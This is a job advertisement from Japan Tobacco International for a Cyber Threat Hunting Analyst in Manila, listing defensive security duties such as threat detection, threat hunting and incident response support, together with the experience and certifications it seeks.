Cyber Threat Hunting Analyst

xpatjobs       |    Location:Makati , Metro Manila       |    Country:Philippines

Were JTI, Japan Tobacco International, and we believe in freedom. We think that the possibilities are limitless when youre free to choose. Weve spent the last 20 years innovating and creating new and better products for our consumers to choose from. Its how weve grown to be present in 130 countries, and how weve grown from 40 to 4,000+ employees in the Philippines since 2009. But our business isnt just business, our business is our people. Their talent. Their potential. We believe that when theyre free to be themselves, to grow, travel and develop, amazing things can happen for our business. Thats why our employees, from around the world, choose to be a part of JTI. Its why 9 out of 10 would recommend us to a friend, and why weve been recognized as INVESTORS IN PEOPLE in the Philippines Its the perfect moment for you to #JoinTheIdea. Were opening our Global Business Service center in the heart of BGC Manila and looking for more than 300 bright minds to join a global multinational with an exciting start-up vibe. This advertisement will remain available until the role is filled. Cyber Threat Hunting Analyst This position exists to support the Cyber Threat Hunting Manager to implement proccesses and technologies for the early detection of potential security threats. The Cyber Threat Hunting Analyst will contribute to the definition, implementation and maintainance of the Threat Detection and Hunting service according to relevance, potential impact and risks. Additionally, the Analyst will:1. Contribute to correlate threat actor profiles and TTPs to attack vectors to develop new use cases or hypothesis for hunting campaigns.2. Provide support to ensure the service is adequately delivered together with our MSSP provider and consistently integrated with the other security platforms and services.3. Collaborate to enhance and maintain partnership with other Information Security functions to deliver shared outcomes that measurably improve JTI SOC efficiency to detect and respond to threats.4. Create reports and propose corrective actions to enhance the IT security posture. Desirable: Certifications (any security certification like but not exclusive to the following): CEH, CISSP, OSCP, GIAC What you will do? 1. Threat DetectionSupport to the log onboarding process and contribute to the implementation of new monitoring use cases along with their lifecycle.Support to the creation of visibility/detection coverage mappings and the identification of gaps to detect relevant threats, actors and tools.Provide security monitoring backup to ensure no security detections are missed. 2. Threat HuntingSupport Threat Hunting program creation, maintenance and continuous improvement.Contribute to the creation of threat hunting hypothesis.Participate in Threat Hunting activies based on TTPs and IOCs triggered by CTI, threat hunting hypothesis, security monitoring, incident response or others.Contribute to the development of new monitoring use cases based on threat hunting results. 3. Cross-functional collaborationParticipation in Threat Modelling in conjunction with Cyber Threat Intelligence functions.Support Incident Response during significant or major Security Incidents, collaborate in the creation of triage playbooks and collaborate in the reduction of number of false positives.Collaboration with TSC for security product enhacement or problems/misconfigurations resolution. 4. Thrid-Party collaborationCollaborate and align with security vendor/MSSP provider to ensure that service delivery and support meet performance and business objectives. 5. ReportingParticipate in the creation of reporting based on metrics to measure effectiveness of Threat Detection and Hunting service. Who are we looking for? University Degree in the area of Computer sciences or related field 1+ years of relevant experience as a member of a Threat Detection, Hunting, Incident Response, Malware Analysis, or similar role. Previous Red/Purple Teamer experience is a plus. Good understanding of Cybersecurity fundamentals, Threat Landscape, Attack Vectors, Threat Actors and their Tactics Techniques and Procedures. Familiarity or background in Intelligence Driven Defense, Cyber Kill Chain methodology, and/or MITRE ATT&CK framework. Knowledge on security platforms (XDR, IDS/IPS, WAF, etc.). Experience with Microsoft products is a plus. E.g. Microsoft Defender for Enpoint. Relevant experience of SIEM and Data Lake searching languages (Splunk and Microsoft suite are a plus). Knowledge of Windows system internals, Web Applications and APIs. Familiarity with nation state, criminal, and financially motivated actor groups. A proven track record in protecting large global and distributed organisations. Scripting skills is a plus What are the next steps? Thank you for applying! We will make sure to provide you with feedback within the next two weeks.